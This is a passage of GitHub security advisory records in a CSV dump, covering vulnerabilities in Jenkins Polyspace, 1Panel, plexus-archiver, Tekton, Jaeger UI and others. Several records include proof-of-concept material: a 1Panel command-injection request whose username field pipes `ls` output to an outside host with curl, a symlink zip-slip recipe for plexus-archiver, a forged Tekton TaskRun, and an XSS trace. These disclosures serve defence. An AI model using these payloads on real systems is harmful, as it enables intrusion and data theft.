MathWorks Polyspace Plugin vulnerable to arbitrary file read,"Jenkins MathWorks Polyspace Plugin 1.0.5 and earlier does not restrict the path of the attached files in Polyspace Notification post-build step. This allows attackers with Item/Configure permission to send emails with arbitrary files from the Jenkins controller file system.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.mathworks.polyspace.jenkins:mathworks-polyspace'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37960'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-07-12/#SECURITY-3124'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/07/12/2'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-12T22:30:48Z', 'nvd_published_at': None}" 1.4.0,GHSA-v93h-rwj8-78qh,2023-07-06T23:10:54Z,2023-07-06T21:14:56Z,,['CVE-2023-28936'],Apache OpenMeetings insufficient authorization vulnerability,"Attacker can access arbitrary recording/room Vendor: The Apache Software Foundation Versions Affected: Apache OpenMeetings from 2.0.0 before 7.1.0 ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.openmeetings:openmeetings-db'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '7.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28936'}, {'type': 'WEB', 'url': 'https://github.com/apache/openmeetings/commit/a28dea888fca1c5c3e0ce4c8a4c62f501aebe0cd'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/openmeetings'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/OPENMEETINGS-2762'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/y6vng44c22ll221rtvsv208x1pbjmdoc'}]","{'cwe_ids': ['CWE-697'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T23:10:54Z', 'nvd_published_at': None}" 1.4.0,GHSA-p7w2-784m-qpq9,2023-07-20T14:55:52Z,2023-07-12T12:31:35Z,,['CVE-2022-45855'],Apache Ambari Expression Language Injection vulnerability,"SpringEL injection in the metrics source in Apache Ambari version 2.7.0 to 2.7.6 allows a malicious authenticated user to execute arbitrary code remotely. Users are recommended to upgrade to 2.7.7. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.ambari:ambari'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-45855'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/ambari'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/302c4hwfjy9lx63jrbhcdx948pxc54l1'}]","{'cwe_ids': ['CWE-917'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-12T17:29:53Z', 'nvd_published_at': None}" 1.4.0,GHSA-74mc-g2xv-pch2,2023-07-20T19:16:24Z,2023-07-12T12:31:36Z,,['CVE-2023-37579'],Apache Pulsar Function Worker Incorrect Authorization vulnerability,"Incorrect Authorization vulnerability in Apache Software Foundation Apache Pulsar Function Worker. This issue affects Apache Pulsar: before 2.10.4, and 2.11.0. Any authenticated user can retrieve a source's configuration or a sink's configuration without authorization. Many sources and sinks contain credentials in the configuration, which could lead to leaked credentials. This vulnerability is mitigated by the fact that there is not a known way for an authenticated user to enumerate another tenant's sources or sinks, meaning the source or sink name would need to be guessed in order to exploit this vulnerability. The recommended mitigation for impacted users is to upgrade the Pulsar Function Worker to a patched version. 2.10 Pulsar Function Worker users should upgrade to at least 2.10.4. 2.11 Pulsar Function Worker users should upgrade to at least 2.11.1. 3.0 Pulsar Function Worker users are unaffected. Any users running the Pulsar Function Worker for 2.9.* and earlier should upgrade to one of the above patched versions. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.pulsar:pulsar-functions-worker'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.10.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.pulsar:pulsar-functions-worker'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.11.0'}, {'fixed': '2.11.1'}]}], 'versions': ['2.11.0']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37579'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/pulsar'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/0dmn3cb5n2p08o3cpj3ycfhzfqs2ppwz'}]","{'cwe_ids': ['CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-12T17:30:28Z', 'nvd_published_at': None}" 1.4.0,GHSA-m88m-crr9-jvqq,2023-07-18T18:47:27Z,2023-07-18T18:47:27Z,,['CVE-2023-37476'],OpenRefine vulnerable to zip slip in project import,"### Impact A carefully crafted malicious OpenRefine project tar file can be used to trigger arbitrary code execution if a user can be convinced to import it. ### Patches The vulnerability exists in all versions of OpenRefine up to and including 3.7.3. Users should update to OpenRefine 3.7.4 as soon as possible. ### Workarounds Only import OpenRefine projects from trusted sources. ### References A similar [issue](https://github.com/OpenRefine/OpenRefine/issues/1840) existed in the Create Project feature ([CVE-2018-19859](https://nvd.nist.gov/vuln/detail/CVE-2018-19859)), which was fixed by PR [#1901](https://github.com/OpenRefine/OpenRefine/pull/1901).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.openrefine:main'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.7.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/OpenRefine/OpenRefine/security/advisories/GHSA-m88m-crr9-jvqq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37476'}, {'type': 'WEB', 'url': 'https://github.com/OpenRefine/OpenRefine/commit/e9c1e65d58b47aec8cd676bd5c07d97b002f205e'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenRefine/OpenRefine'}, {'type': 'WEB', 'url': 'https://github.com/OpenRefine/OpenRefine/releases/tag/3.7.4'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-18T18:47:27Z', 'nvd_published_at': None}" 1.4.0,GHSA-q2mx-gpjf-3h8x,2023-07-05T21:38:07Z,2023-07-05T21:38:07Z,,['CVE-2023-36457'],1Panel vulnerable to command injection when adding container repositories,"### Impact The authenticated attacker can craft a malicious payload to achieve command injection when adding container repositories. 1. Vulnerability analysis. ``` backend\app\api\v1\image_repo.go#create ``` ![image](https://user-images.githubusercontent.com/46734380/249118560-8c20dac6-d1be-49d2-b2b2-9a4df9b7cd04.png) ``` backend\app\service\image_repo.go#CheckConn ``` ![image](https://user-images.githubusercontent.com/46734380/249118639-37b7a1e9-08a9-4316-8beb-39beefdceb33.png) 2. vulnerability reproduction. ``` POST /api/v1/containers/repo HTTP/1.1 Host: 192.168.109.152:40982 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-CSRF-TOKEN: Content-Length: 446 Origin: http://192.168.109.152:40982 Connection: close Referer: http://192.168.109.152:40982/containers/repo Cookie: rem-username=admin; psession=a6bcab14-d426-4cfe-8635-533e88b6f75e ``` ``` {""id"":2,""createdAt"":""2023-04-13T19:57:43.633643247-07:00"",""name"":""asdasd"",""downloadUrl"":""127.0.0.1:8080"",""protocol"":""http"",""username"":""admin||curl http://192.168.109.1:12345/`ls`||"",""auth"":true,""status"":""Failed"",""message"":""stderr: WARNING! Using --password via the CLI is insecure. Use --password-stdin.\nError response from daemon: Get \""http://127.0.0.1:8080/v2/\"": dial tcp 127.0.0.1:8080: connect: connection refused\n"",""password"":""Passw0rd""} ``` 3. Using update can be triggered multiple times. ``` POST /api/v1/containers/repo/update HTTP/1.1 Host: 192.168.109.152:40982 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-CSRF-TOKEN: Content-Length: 447 Origin: http://192.168.109.152:40982 Connection: close Referer: http://192.168.109.152:40982/containers/repo Cookie: rem-username=admin; psession=a6bcab14-d426-4cfe-8635-533e88b6f75e ``` ``` {""id"":2,""createdAt"":""2023-04-13T19:57:43.633643247-07:00"",""name"":""asdasd"",""downloadUrl"":""127.0.0.1:8080"",""protocol"":""http"",""username"":""admin||curl http://192.168.109.1:12345/`pwd`||"",""auth"":true,""status"":""Failed"",""message"":""stderr: WARNING! Using --password via the CLI is insecure. Use --password-stdin.\nError response from daemon: Get \""http://127.0.0.1:8080/v2/\"": dial tcp 127.0.0.1:8080: connect: connection refused\n"",""password"":""Passw0rd""} ``` Affected versions: <= 1.3.5 ### Patches The vulnerability has been fixed in v1.3.6. ### Workarounds It is recommended to upgrade the version to v1.3.6. ### References If you have any questions or comments about this advisory: Open an issue in https://github.com/1Panel-dev/1Panel Email us at wanghe@fit2cloud.com ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/1Panel-dev/1Panel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-q2mx-gpjf-3h8x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36457'}, {'type': 'PACKAGE', 'url': 'https://github.com/1Panel-dev/1Panel'}, {'type': 'WEB', 'url': 'https://github.com/1Panel-dev/1Panel/releases/tag/v1.3.6'}]","{'cwe_ids': ['CWE-74', 'CWE-77'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-05T21:38:07Z', 'nvd_published_at': None}" 1.4.0,GHSA-2w8w-qhg4-f78j,2023-07-11T22:45:37Z,2023-07-11T22:45:37Z,,[],A stored XSS in jaeger UI might allow an attacker who controls a trace to perform arbitrary jaeger queries,"Related UI vulnerability advisory: https://github.com/jaegertracing/jaeger-ui/security/advisories/GHSA-vv24-rm95-q56r ### Summary Jaeger UI is using the `json-markup` dependency to display span attributes and resources. This dependency is not sanitising keys of an object though, thus the `KeyValuesTable` is vulnerable to XSS. ### Details The vulnerable line is here: https://github.com/jaegertracing/jaeger-ui/blob/main/packages/jaeger-ui/src/components/TracePage/TraceTimelineViewer/SpanDetail/KeyValuesTable.tsx#L49 ### PoC 1. Start a Jaeger UI 2. Save the following trace as a file: ```json { ""data"": [ { ""traceID"": ""076ef819cc06c45a"", ""spans"": [ { ""traceID"": ""076ef819cc06c45a"", ""spanID"": ""076ef819cc06c45a"", ""flags"": 1, ""operationName"": ""and open 'attributes'"", ""references"": [], ""startTime"": 1678196149232010, ""duration"": 13485, ""tags"": [ { ""key"": ""sampler.type"", ""type"": ""string"", ""value"": ""{\""\"":\""test\""}"" } ], ""logs"": [], ""processID"": ""p1"", ""warnings"": null } ], ""processes"": { ""p1"": { ""serviceName"": ""click here"", ""tags"": [ ] } }, ""warnings"": null } ], ""total"": 0, ""limit"": 0, ""offset"": 0, ""errors"": null } ``` 3. Upload that trace to Jaeger UI in order to visualise it. 4. Open the trace, open it's span's attributes. 5. XSS should be fired. ### Impact This is a XSS on Jaeger UI. XSS can be used to run JavaScript. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/jaegertracing/jaeger'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.47.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jaegertracing/jaeger-ui/security/advisories/GHSA-vv24-rm95-q56r'}, {'type': 'WEB', 'url': 'https://github.com/jaegertracing/jaeger/security/advisories/GHSA-2w8w-qhg4-f78j'}, {'type': 'PACKAGE', 'url': 'https://github.com/jaegertracing/jaeger'}, {'type': 'WEB', 'url': 'https://github.com/jaegertracing/jaeger-ui/blob/main/packages/jaeger-ui/src/components/TracePage/TraceTimelineViewer/SpanDetail/KeyValuesTable.tsx#L49'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-11T22:45:37Z', 'nvd_published_at': None}" 1.4.0,GHSA-9q9v-qgwx-84mr,2023-07-31T19:02:11Z,2023-07-26T12:30:28Z,,['CVE-2023-38673'],Command injection in PaddlePaddle,"PaddlePaddle before 2.5.0 has a command injection in fs.py. This resulted in the ability to execute arbitrary commands on the operating system. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'paddlepaddle'}, 'ecosystem_specific': {'affected_functions': ['paddle.distributed.fleet.utils.LocalFS']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38673'}, {'type': 'WEB', 'url': 'https://github.com/PaddlePaddle/Paddle/commit/2bfe358043096fdba9e2a4cf0f5740102b37fd8f'}, {'type': 'PACKAGE', 'url': 'https://github.com/PaddlePaddle/Paddle'}, {'type': 'WEB', 'url': 'https://github.com/PaddlePaddle/Paddle/blob/develop/security/advisory/pdsa-2023-005.md'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/paddlepaddle/PYSEC-2023-126.yaml'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-26T22:33:35Z', 'nvd_published_at': None}" 1.4.0,GHSA-wh3p-fphp-9h2m,2023-08-03T17:59:29Z,2023-07-25T17:20:43Z,,['CVE-2023-37460'],Arbitrary File Creation in AbstractUnArchiver,"### Summary Using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution. ### Description When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the resolveFile() function will return the symlink's source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later Files.newOutputStream(), that follows symlinks by default, will actually write the entry's content to the symlink's target. ### Impact Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. ### Technical Details In [AbstractUnArchiver.java](https://github.com/codehaus-plexus/plexus-archiver/blob/plexus-archiver-4.7.1/src/main/java/org/codehaus/plexus/archiver/AbstractUnArchiver.java#L342): ```java protected void extractFile( final File srcF, final File dir, final InputStream compressedInputStream, String entryName, final Date entryDate, final boolean isDirectory, final Integer mode, String symlinkDestination, final FileMapper[] fileMappers) throws IOException, ArchiverException { ... // Hmm. Symlinks re-evaluate back to the original file here. Unsure if this is a good thing... final File targetFileName = FileUtils.resolveFile( dir, entryName ); // Make sure that the resolved path of the extracted file doesn't escape the destination directory // getCanonicalFile().toPath() is used instead of getCanonicalPath() (returns String), // because ""/opt/directory"".startsWith(""/opt/dir"") would return false negative. Path canonicalDirPath = dir.getCanonicalFile().toPath(); Path canonicalDestPath = targetFileName.getCanonicalFile().toPath(); if ( !canonicalDestPath.startsWith( canonicalDirPath ) ) { throw new ArchiverException( ""Entry is outside of the target directory ("" + entryName + "")"" ); } try { ... if ( !StringUtils.isEmpty( symlinkDestination ) ) { SymlinkUtils.createSymbolicLink( targetFileName, new File( symlinkDestination ) ); } else if ( isDirectory ) { targetFileName.mkdirs(); } else { try ( OutputStream out = Files.newOutputStream( targetFileName.toPath() ) ) { IOUtil.copy( compressedInputStream, out ); } } targetFileName.setLastModified( entryDate.getTime() ); if ( !isIgnorePermissions() && mode != null && !isDirectory ) { ArchiveEntryUtils.chmod( targetFileName, mode ); } } catch ( final FileNotFoundException ex ) { getLogger().warn( ""Unable to expand to file "" + targetFileName.getPath() ); } } ``` When given an entry that already exists in dir as a symbolic link whose target does not exist - the symbolic link’s target will be created and the content of the archive’s entry will be written to it. That’s because the way FileUtils.resolveFile() works: ```java public static File resolveFile( final File baseFile, String filename ) { ... try { file = file.getCanonicalFile(); } catch ( final IOException ioe ) { // nop } return file; } ``` File.getCanonicalFile() (tested with the most recent version of openjdk (22.2) on Unix) will eventually call [JDK_Canonicalize()](https://github.com/openjdk/jdk/blob/jdk-22%2B2/src/java.base/unix/native/libjava/canonicalize_md.c#LL48C1-L68C69): ```cpp JNIEXPORT int JDK_Canonicalize(const char *orig, char *out, int len) { if (len < PATH_MAX) { errno = EINVAL; return -1; } if (strlen(orig) > PATH_MAX) { errno = ENAMETOOLONG; return -1; } /* First try realpath() on the entire path */ if (realpath(orig, out)) { /* That worked, so return it */ collapse(out); return 0; } else { /* Something's bogus in the original path, so remove names from the end until either some subpath works or we run out of names */ ... ``` realpath() returns the destination path for a symlink, if this destination exists. But if it doesn’t - it will return NULL and we will reach the else’s clause, which will eventually return the path of the symlink itself. So in case the entry is already exists as a symbolic link to a non-existing file - file.getCanonicalFile() will return the absolute path of the symbolic link and this check will pass: ```java Path canonicalDirPath = dir.getCanonicalFile().toPath(); Path canonicalDestPath = targetFileName.getCanonicalFile().toPath(); if ( !canonicalDestPath.startsWith( canonicalDirPath ) ) { throw new ArchiverException( ""Entry is outside of the target directory ("" + entryName + "")"" ); } ``` Later, the content of the entry will be written to the symbolic link’s destination and by doing so will create the destination file and fill it with the entry’s content. Arbitrary file creation can lead to remote code execution. For example, if there is an SSH server on the victim’s machine and ~/.ssh/authorized_keys does not exist - creating this file and filling it with an attacker's public key will allow the attacker to connect the SSH server without knowing the victim’s password. ### PoC We created a zip as following: ```bash $ ln -s /tmp/target entry1 $ echo -ne “content” > entry2 $ zip --symlinks archive.zip entry1 entry2 ``` The following command will change the name of entry2 to entry1: ```bash $ sed -i 's/entry2/entry1/' archive.zip ``` We put archive.zip in /tmp and create a dir for the extracted files: ```bash $ cp archive.zip /tmp $ mkdir /tmp/extracted_files ``` Next, we wrote a java code that opens archive.zip: ```java package com.example; import java.io.File; import org.codehaus.plexus.archiver.zip.ZipUnArchiver; public class App { public static void main( String[] args ) { ZipUnArchiver unArchiver = new ZipUnArchiver(new File(""/tmp/archive.zip"")); unArchiver.setDestDirectory(new File(""/tmp/extracted_files"")); unArchiver.extract(); } } ``` After running this java code, we can see that /tmp/target contains the string “content”: ``` $ cat /tmp/target content ``` Notice that although we used here a duplicated entry name in the same archive, this attack can be performed also by two different archives - one that contains a symlink and another archive that contains a regular file with the same entry name as the symlink.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.codehaus.plexus:plexus-archiver'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.8.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37460'}, {'type': 'WEB', 'url': 'https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2'}, {'type': 'PACKAGE', 'url': 'https://github.com/codehaus-plexus/plexus-archiver'}, {'type': 'WEB', 'url': 'https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-25T17:20:43Z', 'nvd_published_at': None}" 1.4.0,GHSA-mvj3-qrqh-cjvr,2023-07-18T19:15:58Z,2023-07-05T21:33:48Z,,['CVE-2023-34450'],CometBFT PeerState JSON serialization deadlock,"### Impact An internal modification to the way struct `PeerState` is serialized to JSON introduced a deadlock when new function MarshallJSON is called. This function can be called from two places: 1. Via logs * Setting the `consensus` logging module to ""debug"" level (should not happen in production), and * Setting the log output format to JSON 2. Via RPC `dump_consensus_state` Case 1 above, which should not be hit in production, will eventually hit the deadlock in most goroutines, effectively halting the node. In case 2, only the data structures related to the first peer will be deadlocked, together with the thread(s) dealing with the RPC request(s). This means that only one of the channels of communication to the node's peers will be blocked. Eventually the peer will timeout and excluded from the list (typically after 2 minutes). The goroutines involved in the deadlock will not be garbage collected, but they will not interfere with the system after the peer is excluded. The theoretical worst case for case 2, is a network with only two validator nodes. In this case, each of the nodes only has one `PeerState` struct. If `dump_consensus_state` is called in either node (or both), the chain will halt until the peer connections time out, after which the nodes will reconnect (with different `PeerState` structs) and the chain will progress again. Then, the same process can be repeated. As the number of nodes in a network increases, and thus, the number of peer struct each node maintains, the possibility of reproducing the perturbation visible with 2 nodes decreases. Only the first `PeerState` struct will deadlock, and not the others (RPC `dump_consensus_state` accesses them in a for loop, so the deadlock at the first iteration causes the rest of the iterations of that ""for"" loop to never be reached). This regression was introduced in versions `v0.34.28` and `v0.37.1`, and will be fixed in `v0.34.29` and `v0.37.2`. ### Patches The PR containing the fix is [here](https://github.com/cometbft/cometbft/pull/865), and the corresponding issue is [here](https://github.com/cometbft/cometbft/pull/863) ### Workarounds For case 1 (hitting the deadlock via logs) * either don't set the log output to ""json"", leave at ""plain"", * or don't set the consensus logging module to ""debug"", leave it at ""info"" or higher. For case 2 (hitting the deadlock via RPC `dump_consensus_state`) * do not expose `dump_consensus_state` RPC endpoint to the public internet (e.g., via rules in your nginx setup) ### References * [Issue](https://github.com/cometbft/cometbft/pull/863) that introduced the deadlock * [Issue](https://github.com/cometbft/cometbft/pull/524) reporting the bug via logs ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/cometbft/cometbft'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.34.28'}, {'fixed': '0.34.29'}]}], 'versions': ['0.34.28']}, {'package': {'ecosystem': 'Go', 'name': 'github.com/cometbft/cometbft'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.37.1'}, {'fixed': '0.37.2'}]}], 'versions': ['0.37.1']}]","[{'type': 'WEB', 'url': 'https://github.com/cometbft/cometbft/security/advisories/GHSA-mvj3-qrqh-cjvr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34450'}, {'type': 'WEB', 'url': 'https://github.com/cometbft/cometbft/pull/524'}, {'type': 'WEB', 'url': 'https://github.com/cometbft/cometbft/pull/863'}, {'type': 'WEB', 'url': 'https://github.com/cometbft/cometbft/pull/865'}, {'type': 'PACKAGE', 'url': 'https://github.com/cometbft/cometbft'}]","{'cwe_ids': ['CWE-401', 'CWE-770'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-05T21:33:48Z', 'nvd_published_at': None}" 1.4.0,GHSA-w2h3-vvvq-3m53,2023-07-07T18:46:19Z,2023-07-07T18:46:19Z,,['CVE-2023-37264'],Pipelines do not validate child UIDs,"### Summary Pipelines do not validate child UIDs, which means that a user that has access to create TaskRuns can create their own Tasks that the Pipelines controller will accept as the child Task. We should add UID to PipelineRun status and validate that child Run status/results only come from Runs matching the same UID. ### Details While we [store and validate the PipelineRun's (api version, kind, name, uid) in the child Run's OwnerReference](https://github.com/tektoncd/pipeline/blob/2d38f5fa840291395178422d34b36b1bc739e2a2/pkg/reconciler/pipelinerun/pipelinerun.go#L1358-L1372), we only store (api version, kind, name) in the [ChildStatusReference](https://pkg.go.dev/github.com/tektoncd/pipeline/pkg/apis/pipeline/v1beta1#ChildStatusReference) . This means that if a client had access to create TaskRuns on a cluster, they could create a child TaskRun for a pipeline with the same name + owner reference, and the Pipeline controller picks it up as if it was the original TaskRun. This is problematic since it can let users modify the config of Pipelines at runtime, which violates SLSA L2 Service Generated / Non-falsifiable requirements. I believe this is also true for [TaskRuns -> Pods since it looks like we only lookup by name](https://github.com/tektoncd/pipeline/blob/0b8349b770a76877051c9c790c94bf9ed897c75c/test/pipelinerun_test.go#L992), though I haven't tested this. If you have update permissions on tekton resources, you could also perform a similar bypass like this (because it's difficult to distinguish this from a Task retry). For now, I think relying on RBAC is fine and treat update as a privileged role (though we should perhaps update docs to stress this). Create is the most problematic for now. SPIFFE/SPIRE might be able to help with ensuring that only the controller can modify state long term (e.g. sign the expected UIDs?) ### PoC ```yaml apiVersion: [tekton.dev/v1beta1](http://tekton.dev/v1beta1) kind: PipelineRun metadata: name: hello-pr spec: pipelineSpec: tasks: - name: task1 taskSpec: steps: - name: echo image: [distroless.dev/alpine-base](http://distroless.dev/alpine-base) script: | sleep 60 - name: task2 runAfter: [task1] taskSpec: steps: - name: echo image: [distroless.dev/alpine-base](http://distroless.dev/alpine-base) script: | echo ""asdf"" > $(results.foo.path) results: - name: foo results: - name: foo value: $(tasks.task2.results.foo) ``` Once this is running, grab the PR UID: ```sh $ k get pr hello-pr -o json | jq .metadata.uid -r ``` While pipeline is running task 1, start fake task 2: ```yaml apiVersion: [tekton.dev/v1beta1](http://tekton.dev/v1beta1) kind: TaskRun metadata: annotations: labels: [app.kubernetes.io/managed-by](http://app.kubernetes.io/managed-by): tekton-pipelines [tekton.dev/memberOf](http://tekton.dev/memberOf): tasks [tekton.dev/pipeline](http://tekton.dev/pipeline): hello-pr [tekton.dev/pipelineRun](http://tekton.dev/pipelineRun): hello-pr [tekton.dev/pipelineTask](http://tekton.dev/pipelineTask): task2 name: hello-pr-task2 namespace: default ownerReferences: - apiVersion: [tekton.dev/v1beta1](http://tekton.dev/v1beta1) blockOwnerDeletion: true controller: true kind: PipelineRun name: hello-pr uid: af549647-4532-468b-90c5-29122a408f8d <--- this should be UID of PR fetched in last step spec: serviceAccountName: default taskSpec: results: - name: foo type: string steps: - image: [distroless.dev/alpine-base](http://distroless.dev/alpine-base) name: echo resources: {} script: | echo ""zxcv"" > $(results.foo.path) ``` Get pipeline results - it shows the output of the 2nd injected TaskRun ``` $ k get pr -o json hello-pr | jq .status.pipelineResults [ { ""name"": ""foo"", ""value"": ""zxcv\n"" } ] ``` ### Impact This can be used to trick the Pipeline controller into associating unrelated Runs to the Pipeline, feeding its data through the rest of the Pipeline. This requires access to create TaskRuns, so impact may vary depending on your Tekton setup. **If users already have unrestricted access to create any Task/PipelineRun, this does not grant any additional capabilities**. Worst case example would be a supply chain attack where a malicious TaskRun triggered from Triggers/Workflows intercepts and replaces a task in a trusted Pipeline.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/tektoncd/pipeline'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.35.0'}, {'last_affected': '0.49.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tektoncd/pipeline/security/advisories/GHSA-w2h3-vvvq-3m53'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37264'}, {'type': 'PACKAGE', 'url': 'https://github.com/tektoncd/pipeline'}, {'type': 'WEB', 'url': 'https://github.com/tektoncd/pipeline/blob/2d38f5fa840291395178422d34b36b1bc739e2a2/pkg/reconciler/pipelinerun/pipelinerun.go#L1358-L1372'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/github.com/tektoncd/pipeline/pkg/apis/pipeline/v1beta1#ChildStatusReference'}]","{'cwe_ids': ['CWE-345'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-07-07T18:46:19Z', 'nvd_published_at': None}" 1.4.0,GHSA-q5p5-xg93-2jqc,2023-07-06T23:31:27Z,2023-07-06T21:14:59Z,,['CVE-2023-31062'],Apache InLong Improper Privilege Management vulnerability,"Improper Privilege Management Vulnerabilities in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.2.0 through 1.6.0.  When the attacker has access to a valid (but unprivileged) account, the exploit can be executed using Burp Suite by sending a login request and following it with a subsequent HTTP request using the returned cookie. Users are advised to upgrade to Apache InLong's 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7836 to solve it. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 